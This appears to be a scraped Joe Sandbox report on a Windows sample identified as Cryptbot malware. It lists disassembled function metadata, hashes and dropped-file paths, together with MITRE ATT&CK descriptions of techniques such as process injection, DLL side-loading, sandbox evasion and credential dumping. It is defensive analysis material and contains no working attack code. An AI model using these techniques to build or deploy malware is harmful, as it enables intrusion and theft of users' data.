Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 95fd323eb0a6fbac57278266bf100a324665c3f418bfd048323c3b23b6fabd7f
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 25313672904A05CFCB14CF68C1857AABFF5BF88340F158A59D989AB702E734E944DB90

Function 6C303616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C303567
fputc.MSVCRT ref: 6C3035D7
memset.MSVCRT ref: 6C303692

Strings

o, xrefs: 6C30362E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: be5dc722e254f5f45e1d5c2e89d55ae16f1e643fa6ed8bac1ed4e32199c53c8e
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: A3316872A08705CFCB40CF68C180B99BBF1BF49354F158A59D989ABB51E735E905CF50

Function 00533424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0053338F
fputc.MSVCRT ref: 005333F1

Strings

@, xrefs: 0053342A

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: b8467576d718404f978f4330587051c170caae09c0ce789271a938db22351e2c
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: CE1107B1A042048BCB15CF28C1C47A9BFE1BF89701F25CA59ED899F24ADB34EE00CB44

Function 6C303AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C303A5F
fputc.MSVCRT ref: 6C303AC1

Strings

@, xrefs: 6C303AFA

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 24bd4a84b592704a786a0bea0bc8c5d5963b8c3250e8459d81013f699ba13731
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 6611D7B2B092108BCB40CF28C581B997BB5BF89308F258659ED996FB4AD335E801CF55

Function 005318B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 0053191E

Strings

Unknown error, xrefs: 005318B2
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 005318FF

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: b425b9c3bbe6267aa9a5dc7e75b0f7b97f2939519c56bd369ec9834d8fb9ab12
Instruction ID: 62e36087f3d7b5fed5bf94675b59835374d4ebea3d4df620b841e8b5e8b48c50
Opcode Fuzzy Hash: b425b9c3bbe6267aa9a5dc7e75b0f7b97f2939519c56bd369ec9834d8fb9ab12
Instruction Fuzzy Hash: D80180B0408B45DBD700AF15E48841AFFF1FF89350F868898F5C946269DB3298A8CB46

Function 6C317561 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C317583

Part of subcall function 6C363E00: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C317596), ref: 6C363E63

strlen.MSVCRT ref: 6C3175F4
strlen.MSVCRT ref: 6C317662
strlen.MSVCRT ref: 6C3176D6

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 81a2c9d08f384c6363d2cda8f1f0db16ae1a4ba7b0c36966bec5593446808c08
Instruction ID: 6004e0af0b25fbf4b2ae5b3887db7d38822b60fb6cbc0319992021188fb55671
Opcode Fuzzy Hash: 81a2c9d08f384c6363d2cda8f1f0db16ae1a4ba7b0c36966bec5593446808c08
Instruction Fuzzy Hash: 73511975A09A108FCB04DF29C09865DFBF6BF46304F4585ADD8855FB65CB35A809CF82

Function 00536B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,00536C81,?,?,?,?,?,?,00000000,00534F24), ref: 00536B87
InitializeCriticalSection.KERNEL32(?,?,?,?,00536C81,?,?,?,?,?,?,00000000,00534F24), ref: 00536BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,00536C81,?,?,?,?,?,?,00000000,00534F24), ref: 00536BD0
EnterCriticalSection.KERNEL32(?,?,?,?,00536C81,?,?,?,?,?,?,00000000,00534F24), ref: 00536BF8

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 2b01e4bc5d5924dc3972a8fa11391141aa53aaaf96a5013a11891297df535ad6
Instruction ID: 26405350eeb1b19e5ca36343e322332da276ce0f3eebc13647cd8410f43e78fa
Opcode Fuzzy Hash: 2b01e4bc5d5924dc3972a8fa11391141aa53aaaf96a5013a11891297df535ad6
Instruction Fuzzy Hash: EA115BB15082009ADB10BB3CFADA16ABFF0FB11300F154829D882C3310E671E898DBA6

Function 6C308080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C3081A1), ref: 6C3080A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C3081A1), ref: 6C3080E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C3081A1), ref: 6C3080F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C3081A1), ref: 6C308118

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: bea7a6681136e6158ea01d34abbb604c55ef741b474181ecf4e31a788cb6b487
Instruction ID: ef0f876afbad5abe85b0fa18dd86769caa9a0a9bd7b1a5d68cb4a7acc35b5d19
Opcode Fuzzy Hash: bea7a6681136e6158ea01d34abbb604c55ef741b474181ecf4e31a788cb6b487
Instruction Fuzzy Hash: E01112B274A1048ADB00FB28D4876A97BF4AB16318F510926D582C7E01D772E584CF93

Function 00532000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,005321D3,?,?,?,?,?,005317E8), ref: 0053200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,005321D3,?,?,?,?,?,005317E8), ref: 00532035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,005321D3,?,?,?,?,?,005317E8), ref: 0053203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,005321D3,?,?,?,?,?,005317E8), ref: 0053205C

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 245808c3e7585f978847d0e17d250eed9a03b926c324c76e4ea438e429e2acab
Instruction ID: 0e92934f66b8aa834081bcd9d1a4bb753279437ea3cb8ebfba05563cfd1e6e79
Opcode Fuzzy Hash: 245808c3e7585f978847d0e17d250eed9a03b926c324c76e4ea438e429e2acab
Instruction Fuzzy Hash: CBF04FB65007118FDB10BFB8E98951ABFF4FA54750F054528DE8887315E731E81ECBA6

Function 6C2FAB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C2FAB5E
TlsGetValue.KERNEL32 ref: 6C2FAB85
GetLastError.KERNEL32 ref: 6C2FAB8C
LeaveCriticalSection.KERNEL32 ref: 6C2FABAC

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 036b3da2b948e2c2237045032dc9c284846318a7f576fc9cd3839de4affb7b91
Instruction ID: f7390009fec69ef882faa6a6ee9555134b0c24860f9a577886f2197dbb8b68af
Opcode Fuzzy Hash: 036b3da2b948e2c2237045032dc9c284846318a7f576fc9cd3839de4affb7b91
Instruction Fuzzy Hash: 2BF0C8B2A0431ACFDB00FF79D4C692ABB74EA55264F060668ED9447B04D631E549CBA3

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\TMdMlTZMAWbrEijBRYMr.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
file.exe

Function 6C2F14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 0053116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 005315B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 005381E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Function 00538230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Function 005313C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 005311A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 00531160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C3C4230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 00531296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 005313BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C30B1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C30B310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON